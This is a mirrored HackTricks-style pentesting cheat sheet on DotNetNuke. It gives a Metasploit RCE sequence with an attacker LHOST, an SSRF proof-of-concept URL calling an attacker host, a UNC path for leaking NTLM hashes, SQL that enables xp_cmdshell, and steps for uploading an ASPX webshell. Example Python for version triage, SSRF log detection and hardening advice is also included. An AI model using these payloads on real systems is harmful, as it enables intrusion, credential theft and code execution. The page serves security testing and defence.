mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
# DotNetNuke (DNN)

{{#include ../../banners/hacktricks-training.md}}

## DotNetNuke (DNN)

If you log in as **administrator** in DNN it is easy to get **RCE**; however, several *unauthenticated* and *post-auth* techniques have been published over the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.

---

## Version & Environment Assessment

* Check the *X-DNN* HTTP response header – it usually reveals the exact platform version.
* The installation wizard leaks the version at `/Install/Install.aspx?mode=install` (reachable on very old installs).
* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob including `"dnnVersion"` to low-privileged users.
* Typical cookies you will see on a live instance:
  * `.DOTNETNUKE` – ASP.NET forms-authentication ticket.
  * `DNNPersonalization` – contains XML/serialized user-profile data (old versions – see the RCE below).
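To turn the version you recovered above into a triage result, here is an added example (not code from the page or from the DNN project) that parses an `X-DNN`-style version string and maps it onto the affected ranges and patch levels quoted on this page; the version strings and function names are assumptions.

```python
"""Triage a DotNetNuke version string (e.g. the X-DNN header value) against the
affected ranges quoted on this page. Example code; not part of DNN or HackTricks."""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

def parse_version(text: str) -> Tuple[Version, Optional[str]]:
    """Return ((major, minor, patch), prerelease_tag) for strings such as
    '9.13.7', '9.3.0-RC' or 'DNN 10.0.1'. Missing components default to 0."""
    m = re.search(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:-([A-Za-z0-9.]+))?", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    core = tuple(int(g) if g else 0 for g in m.groups()[:3])
    return core, m.group(4)

def assess(text: str) -> List[str]:
    """List the issues from this page that apply to the given version."""
    v, pre = parse_version(text)
    findings = []
    # CVE-2017-9822: affected <= 9.3.0-RC, i.e. anything below 9.3.0, or 9.3.0
    # itself only when it carries a pre-release tag (an RC sorts before the release).
    if v < (9, 3, 0) or (v == (9, 3, 0) and pre is not None):
        if (7, 0, 0) <= v < (9, 2, 0):
            findings.append("CVE-2017-9822 cookie deserialization RCE (unauthenticated)")
        elif v >= (9, 2, 0):
            findings.append("CVE-2017-9822 cookie deserialization RCE (low-priv verified account)")
        else:
            findings.append("CVE-2017-9822 cookie deserialization RCE")
    if v < (9, 13, 8):  # CVE-2025-32372: affected < 9.13.8
        findings.append("CVE-2025-32372 RemoteContentProxy SSRF bypass")
    if (6, 0, 0) <= v < (10, 0, 1):  # CVE-2025-52488: 6.0.0 - 9.x (< 10.0.1)
        findings.append("CVE-2025-52488 NTLM hash exposure via UNC redirect")
    if v < (10, 0, 1):  # CVE-2025-52487: fixed in 10.0.1
        findings.append("CVE-2025-52487 Host/IP filter bypass via X-Forwarded-For")
    return findings

def upgrade_advice(text: str) -> str:
    """Minimum target per the hardening section: 10.0.1 closes every issue listed
    here, 9.13.9 only the SSRF bypass."""
    v, _ = parse_version(text)
    if v >= (10, 0, 1):
        return "up to date for the issues on this page"
    if v >= (9, 13, 9):
        return "upgrade to 10.0.1 (IP filter & NTLM issues remain)"
    return "upgrade to 10.0.1, or 9.13.9 at the very minimum"
```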

---

## Unauthenticated Exploitation

### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)
*Affected versions ≤ 9.3.0-RC*

`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore trigger an arbitrary gadget chain and code execution.

```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST <attacker_ip>
msf> run
```

The module automatically selects the right path for versions that were patched but remain vulnerable (CVE-2018-15811/15812/18325/18326). Exploitation works **without authentication** on 7.x–9.1.x and with a low-privileged *verified* account on 9.2.x+.

### 2. Server-Side Request Forgery (CVE-2025-32372)
*Affected versions < 9.13.8 – Patch released April 2025*

A bypass of the old `DnnImageHandler` fix lets an attacker force the server to issue **unrestricted GET requests** (semi-blind SSRF). Practical impact:

* Internal port scanning / discovery of metadata services in cloud deployments.
* Reaching hosts that are otherwise shielded from the Internet.

Proof of concept (replace `TARGET` & `ATTACKER`):

```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```

The request is triggered in the background; monitor your listener for callbacks.
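On the defensive side, the same endpoint can be watched in the web server logs. The following is an added example (not code from the page or from DNN): a small parser for IIS W3C log lines that flags `/API/RemoteContentProxy` requests whose `url=` host is not on an allowlist, separating internal targets (metadata services, private ranges) from external callbacks. The `#Fields:` layout, the allowlist and the sample log lines are constructed assumptions.

```python
"""Flag /API/RemoteContentProxy requests whose url= parameter targets a host outside
an allowlist, from IIS W3C log lines. Example code; not from DNN or HackTricks."""
import ipaddress
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

ALLOWED_HOSTS = {"cdn.example.com"}  # assumed: hosts the proxy may legitimately fetch

def _is_internal(host: str) -> bool:
    """True for loopback/private/link-local targets (e.g. 169.254.169.254 cloud metadata)."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host == "localhost" or host.endswith(".local")

def parse_w3c(log: str) -> List[dict]:
    """Turn an IIS W3C log (field order taken from its #Fields: header) into row dicts."""
    fields, rows = [], []
    for line in log.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def find_ssrf(log: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, target_host, verdict) for each RemoteContentProxy request whose
    url= host is not allowlisted. IIS stores cs-uri-query percent-encoded; parse_qs decodes it."""
    hits = []
    for row in parse_w3c(log):
        if row.get("cs-uri-stem", "").lower() != "/api/remotecontentproxy":
            continue
        target = parse_qs(row.get("cs-uri-query", "")).get("url", [""])[0]
        host = (urlsplit(target).hostname or "").lower()
        if host in ALLOWED_HOSTS:
            continue
        verdict = "internal-target" if _is_internal(host) else "external-target"
        hits.append((row.get("c-ip", "?"), host, verdict))
    return hits

# Constructed sample log: one legitimate fetch, one metadata-service probe, one callback.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2025-04-02 10:01:05 10.0.0.5 GET /API/RemoteContentProxy url=https%3A%2F%2Fcdn.example.com%2Fa.png 443 203.0.113.7 200
2025-04-02 10:01:09 10.0.0.5 GET /API/RemoteContentProxy url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F 443 203.0.113.7 200
2025-04-02 10:01:12 10.0.0.5 GET /API/RemoteContentProxy url=http%3A%2F%2Fattacker.example.net%3A8080%2Fpoc 443 203.0.113.7 200
2025-04-02 10:01:15 10.0.0.5 GET /Default.aspx - 443 198.51.100.20 200
"""
```

Run `find_ssrf(SAMPLE_LOG)` to get the two flagged rows; any external hit after the patch level in the hardening section below is still worth investigating because the endpoint should normally be blocked when unused.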

### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)
*Affected versions 6.0.0 – 9.x (< 10.0.1)*

Specially crafted content can make DNN attempt to fetch a resource through a **UNC path** such as `\\attacker\share\img.png`. Windows will happily negotiate NTLM, leaking the server account's hashes to the attacker. Upgrade to **10.0.1** or block outbound SMB at the firewall.

### 4. IP Filter Bypass (CVE-2025-52487)
If administrators rely on *Host/IP Filters* to protect the admin portal, be aware that versions before **10.0.1** can be bypassed by altering `X-Forwarded-For` in a reverse-proxy setup.

---

## Post-Authentication to RCE

### Via SQL console
Under **`Settings → SQL`** the built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and run commands:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```

### Uploading an ASPX webshell
1. Go to **`Settings → Security → More → More Security Settings`**.
2. Add `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
3. Visit **`/admin/file-management`** and upload `shell.aspx`.
4. Trigger it at **`/Portals/0/shell.aspx`**.

---

## Privilege Escalation on Windows
Once code execution is obtained as **IIS AppPool\<Site>**, the usual Windows privilege-escalation techniques apply. If the box is vulnerable you can use:

* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
* **Juicy/Sharp Potatoes** to escape *Service Accounts*.

---

## Hardening Recommendations (Blue Team)

* **Update** to at least **9.13.9** (fixes the SSRF bypass) or, better, **10.0.1** (IP filter & NTLM issues).
* Remove leftover **`InstallWizard.aspx*`** files after installation.
* Block outbound SMB (ports 445/139) egress.
* Enforce strict *Host Filters* at the edge proxy instead of inside DNN.
* Block access to `/API/RemoteContentProxy` if unused.

## References

* Metasploit `dnn_cookie_deserialization_rce` module documentation – practical details of the unauthenticated RCE (GitHub).
* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.

{{#include ../../banners/hacktricks-training.md}}